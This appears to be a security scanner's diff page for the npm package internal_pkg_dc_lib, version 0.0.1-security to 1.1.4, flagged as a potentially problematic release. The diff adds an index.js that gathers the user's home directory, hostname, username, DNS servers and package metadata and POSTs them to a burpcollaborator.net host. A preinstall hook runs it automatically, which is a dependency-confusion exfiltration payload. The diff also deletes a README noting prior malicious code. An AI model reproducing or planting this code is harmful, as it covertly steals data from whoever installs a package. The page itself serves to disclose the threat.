internal_pkg_dc_lib 0.0.1-security → 1.1.4

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of internal_pkg_dc_lib might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +46 -0
  2. package/package.json +35 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,46 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+ p: package,
10
+ c: __dirname,
11
+ hd: os.homedir(),
12
+ hn: os.hostname(),
13
+ un: os.userInfo().username,
14
+ dns: dns.getServers(),
15
+ r: packageJSON ? packageJSON.___resolved : undefined,
16
+ v: packageJSON.version,
17
+ pjson: packageJSON,
18
+ });
19
+
20
+ var postData = querystring.stringify({
21
+ msg: trackingData,
22
+ });
23
+
24
+ var options = {
25
+ hostname: "en56s8yt8cz4wp9lculdw427iyoocd.burpcollaborator.net", //replace burpcollaborator.net with Interactsh or pipedream
26
+ port: 443,
27
+ path: "/",
28
+ method: "POST",
29
+ headers: {
30
+ "Content-Type": "application/x-www-form-urlencoded",
31
+ "Content-Length": postData.length,
32
+ },
33
+ };
34
+
35
+ var req = https.request(options, (res) => {
36
+ res.on("data", (d) => {
37
+ process.stdout.write(d);
38
+ });
39
+ });
40
+
41
+ req.on("error", (e) => {
42
+ // console.error(e);
43
+ });
44
+
45
+ req.write(postData);
46
+ req.end();
package/package.json CHANGED
@@ -1,6 +1,38 @@
1
1
  {
2
+ "_from": "internal_pkg_dc_lib",
3
+ "_id": "internal_pkg_dc_lib@1.0.1",
4
+ "_inBundle": false,
5
+ "_integrity": "sha512-VDPFdMjBeO1sF92TdzjSA42k23msQy/D/oDmG3d394SriHJXTcY7aFePcWE5c9+UIb/dJPD+hCFv+Y8Vdg6r5g==",
6
+ "_location": "/internal_pkg_dc_lib",
7
+ "_phantomChildren": {},
8
+ "_requested": {
9
+ "type": "tag",
10
+ "registry": true,
11
+ "raw": "internal_pkg_dc_lib",
12
+ "name": "internal_pkg_dc_lib",
13
+ "escapedName": "internal_pkg_dc_lib",
14
+ "rawSpec": "",
15
+ "saveSpec": null,
16
+ "fetchSpec": "latest"
17
+ },
18
+ "_requiredBy": [
19
+ "#USER",
20
+ "/"
21
+ ],
22
+ "_resolved": "https://registry.npmjs.org/internal_pkg_dc_lib/-/internal_pkg_dc_lib-1.0.1.tgz",
23
+ "_shasum": "f9114325be160a279f8f366b7dfa62ea11cfd92d",
24
+ "_spec": "internal_pkg_dc_lib",
25
+ "_where": "E:\\Tools\\HttpCanary-master",
26
+ "author": "",
27
+ "bundleDependencies": false,
28
+ "deprecated": false,
29
+ "description": "",
30
+ "license": "ISC",
31
+ "main": "index.js",
2
32
  "name": "internal_pkg_dc_lib",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
33
+ "scripts": {
34
+ "test": "echo \"Error: no test specified\" && exit 1",
35
+ "preinstall": "node index.js"
36
+ },
37
+ "version": "1.1.4"
6
38
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=internal_pkg_dc_lib for more information.